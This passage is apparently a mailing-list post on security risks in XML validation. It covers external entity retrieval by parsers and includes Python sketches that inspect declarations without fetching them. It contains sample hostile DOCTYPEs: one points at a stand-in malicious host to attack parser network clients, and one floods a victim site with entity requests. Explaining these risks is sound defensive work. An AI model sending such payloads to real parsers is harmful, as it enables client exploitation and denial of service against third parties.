James Clark wrote,
> Suppose an application is trying to use validation to protect itself
> from bad input. It carefully loads the schema cache with the
> namespaces it knows about, and calls validate(). Now the bad guy
> comes along and uses a root element from some other namespace and
> uses xsi:schemaLocation to point to his own schema that has a
> declaration for that element and uses <xs:any namespace="##any"
> processContents="skip"/>. Won't they just have almost completely
> undermined any protection that was supposed to come from validation?
This is at least partly related to something that's been worrying me on
and off for quite a while now. It seems like a fairly obvious worry,
but I don't recall seeing any explicit discussion of it here (or
anywhere else for that matter).
Many (most?) off the shelf XML parsers, at least when validating, will
by default attempt to retrieve external subsets and other entities via
their system ids. This implies that an arbitrary XML document instance,
whether from a trusted or untrusted source, can cause an XML processor
to make network connections to any host on any port using any protocol
for which retrieval is supported by the network client associated with
the XML processor.
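To make the exposure concrete, here is a minimal sketch in Python that lists the system identifiers a document declares, without retrieving any of them. It assumes the standard library's expat binding, which only reports external identifiers to handlers and makes no network connections of its own. The function name external_references is hypothetical.

```python
import xml.parsers.expat
from typing import List


def external_references(document: bytes) -> List[str]:
    """Return every system identifier declared by the DOCTYPE or by an
    external entity declaration, in document order. Nothing is fetched."""
    found: List[str] = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # system_id is None when the DOCTYPE has no external subset.
        if system_id is not None:
            found.append(system_id)

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # Internal entities carry a value and no system identifier.
        if system_id is not None:
            found.append(system_id)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(document, True)
    return found


if __name__ == "__main__":
    sample = b'<!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri"><foo/>'
    for uri in external_references(sample):
        print(uri)
```

Every identifier in the returned list is a connection that a processor with default retrieval behaviour could be made to open, simply by being handed the document.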
This opens up at least two, possibly more, kinds of attack,
* Exploiting vulnerabilities in network clients.
A malicious host might submit the following kind of document instance
to an XML processor,
<!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri">
The server at www.malicious-host.com could return a response
carefully crafted to exploit weaknesses in the victim XML processor's
network client.
* Using XML processors for denial of service attacks.
Consider the following document instance,
<!DOCTYPE foo [
<!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1">
<!ENTITY hit-2 SYSTEM "http://www.victim.org/victim-uri2">
<!-- repeat ad nauseam ... -->
<!ENTITY hit-n-1 SYSTEM "http://www.victim.org/victim-uri-n-1">
<!ENTITY hit-n SYSTEM "http://www.victim.org/victim-uri-n">
<!-- repeat ad nauseam ... -->
]>
When presented with such a document an unwitting XML processor might
proceed to clobber www.victim.org.
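A receiver could at least measure this kind of amplification before letting any resolver run. What follows is a rough sketch in Python, again assuming the standard library's expat binding, which reports entity declarations without retrieving them. The names retrievals_per_host and exceeds_budget, and the limit of 10 per host, are hypothetical choices for illustration, not part of any parser's API.

```python
import xml.parsers.expat
from collections import Counter
from urllib.parse import urlparse


def retrievals_per_host(document: bytes) -> Counter:
    """Count external entity declarations per target host.
    Nothing is fetched; only the declarations are inspected."""
    hosts = Counter()
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        if system_id is not None:
            # Identifiers without a host (e.g. relative paths) are
            # grouped under the empty string.
            hosts[urlparse(system_id).hostname or ""] += 1

    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(document, True)
    return hosts


def exceeds_budget(document: bytes, max_per_host: int = 10) -> bool:
    """True if any single host is named by more than max_per_host
    external entity declarations (the limit is an arbitrary example)."""
    counts = retrievals_per_host(document)
    return any(count > max_per_host for count in counts.values())
```

A check like this only bounds the declarations in one document. It does nothing about many documents each staying under the limit, so it is a partial measure at best.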
If anyone can come up with variations on this theme I'd be extremely
interested to hear about them.
There are, I think, a couple of conclusions to draw from the examples
above. First, that validating untrusted documents, rather than
protecting receiving applications, might actually be quite a dangerous
activity. Second, that in some contexts XML document instances might be
better thought of as being closer to active content than to text/plain
thanks to the implicit retrieval semantics of references to external
entities.
Neither of these conclusions is particularly surprising, and in some
respects they've been discussed here before under the heading of XML
application robustness. For example, a related case would be the runtime
configuration file which begins,
<!DOCTYPE foo SYSTEM "http://www.unwise.com/config.dtd">
for an application which insists on validating its configuration on
startup, but doesn't maintain a locally cached copy of the DTD: after
the 10,000th sale the server at www.unwise.com collapses under the
strain of 10,000 requests for config.dtd at 9am, leading
to all installations of the application failing. There's also a privacy
issue here: the DTD retrieval could be construed as the application